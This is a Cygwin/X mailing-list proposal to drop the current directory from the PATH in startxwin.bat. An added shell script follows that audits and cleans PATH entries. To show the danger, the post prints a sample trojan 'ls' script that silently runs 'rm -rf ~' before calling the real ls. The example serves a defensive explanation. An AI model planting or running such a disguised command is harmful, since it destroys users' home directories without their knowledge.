This is the mail archive of the cygwin-xfree mailing list for the Cygwin XFree86 project.


Current directory '.' included in startxwin.bat PATH bad practice


PROPOSAL: please remove the current directory from the PATH setting in
startxwin.bat.

EXPLANATION:  I noticed while editing my startxwin.bat to change the
CYGWIN_ROOT to point to my 1.7 installation that the PATH assignment a
couple of lines below it included the current directory as its *first*
directory (this path gets propagated to the default bash environment):

    SET PATH=.;%CYGWIN_ROOT%\bin;%PATH%

Thinking that this was probably just an oversight with a development
version, I was surprised to learn that it has been included in
previous versions of this file for years.  And, from my research it
seems that really nobody has objected.  Anyone who has used UNIX for a
while should know that including the current directory anywhere in any
path is bad practice and that it usually leads to hard-to-find side
effects.  But, to include it as the first directory searched in the
executable search path is just plain evil.  I know this is common in
the DOS/Windows world, and I understand why people do it -- to lessen
the number of keystrokes typed.  In a Cygwin environment, which is
probably going to be a single-user machine in most cases, this isn't
as much of an issue, but that doesn't mean that it shouldn't be
avoided.

For those that don't understand the issue, consider the (extreme) case
where someone creates a file in some directory (in which they have
write access) giving it a commonly used command name.  For example,
let's say someone creates a file named 'ls' which contains the
following:

    #!/bin/sh
    rm -rf ~ &>/dev/null &
    ls $@

Add the executable perms to it:

    chmod 755 ls

And now you've got a ticking time bomb for the user that has included
'.' in their PATH and just happens to navigate to the directory in
which our sneaky script lies.  Worse, in this case, when the user
tries to execute 'ls' in that directory, they won't even see that
their filesystem is being annihilated until it is too late.  That's a
really contrived case.  A more common occurrence might be the
inadvertent execution of an altered copy of a script from another
location in the PATH sitting in the current-directory.  Though not as
dramatic as the previous example, this could lead to confusing operation
where the user would get completely unexpected results -- or worse:
results not identified as such.

--
Unsubscribe info:      http://cygwin.com/ml/#unsubscribe-simple
Problem reports:       http://cygwin.com/problems.html
Documentation:         http://x.cygwin.com/docs/
FAQ:                   http://x.cygwin.com/docs/faq/
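
An added example, not part of the original message or the Cygwin/X project: a small audit that reports where current-directory entries sit in a search path and prints the path without them. It goes beyond the '.' case in the message by also catching empty entries, which POSIX shells treat as the current directory; the function names and sample values are constructed for illustration.

```shell
#!/bin/sh
# Added example. Function names and sample PATH values are constructed.

# True if ENTRY makes the shell search the current directory. POSIX shells
# treat an empty entry (leading, trailing or doubled separator) like ".".
is_cwd_entry() {
    case "$1" in
        ''|.|./|'.\') return 0 ;;
        *) return 1 ;;
    esac
}

# walk_path PATHSTRING SEP MODE
#   MODE=clean     -> print PATHSTRING with current-directory entries removed
#   MODE=positions -> print 1-based positions of those entries (1 = searched first)
walk_path() {
    sep=$2
    rest=$1$sep            # sentinel separator so the last entry is processed
    i=0
    out=
    hits=
    while [ -n "$rest" ]; do
        entry=${rest%%"$sep"*}
        rest=${rest#*"$sep"}
        i=$((i + 1))
        if is_cwd_entry "$entry"; then
            hits="${hits:+$hits }$i"
        else
            out="${out:+$out$sep}$entry"
        fi
    done
    if [ "$3" = positions ]; then
        printf '%s\n' "$hits"
    else
        printf '%s\n' "$out"
    fi
}

# SEP defaults to ":" (POSIX); pass ";" for a Windows-style PATH value.
clean_path()    { walk_path "$1" "${2:-:}" clean; }
cwd_positions() { walk_path "$1" "${2:-:}" positions; }

# Constructed expansion of the startxwin.bat assignment quoted above.
sample='.;C:\cygwin\bin;C:\Windows\system32'
printf 'current-directory entries at: %s\n' "$(cwd_positions "$sample" ';')"
printf 'cleaned PATH: %s\n' "$(clean_path "$sample" ';')"
```
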

